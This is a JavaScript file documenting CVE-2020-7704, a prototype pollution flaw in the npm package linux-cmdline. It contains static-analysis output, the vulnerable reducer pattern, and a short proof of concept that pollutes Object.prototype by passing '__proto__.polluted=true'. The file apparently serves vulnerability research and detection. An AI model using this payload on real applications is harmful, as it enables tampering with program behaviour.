CVE-2020-7704.js

// Module Name : linux-cmdline
// Version : 1.0.0
// CVE number : CVE-2020-7704
// CVSS score : 9.8 (CVSS 3.0)
// Published Date : 19 Aug, 2020

/* DAPP analysis result
[+] FileSize(Bytes) : 5643
[+] Total Time(ms) : 3713
[+] Analysis Time(ms) : 113
[+] Detected AST Pattern 1 : 2
[+] Detected AST Pattern 2 : 1
SCC generation complete
 
**********Prototype Pollution v2 found!**********
[ 5129, 5145 ] node = node [ key ]
[ 5321, 5336 ] node [ key ]= val
*/

// Prototype pollution source code patterns detected
/*
function reducer(result, arg)
{
	...
	node = node[key]    //AST Pattern 1
	...
	node[key] = val     //AST Pattern 2
	...
}
function linuxCmdline(cmdline)
{
	return cmdline.trim().split(' ').reduce(reducer, {})
}
*/

// POC of CVE-2020-7704
const linuxCmdline = require('linux-cmdline')
linuxCmdline('__proto__.polluted=true')
console.log(polluted) //true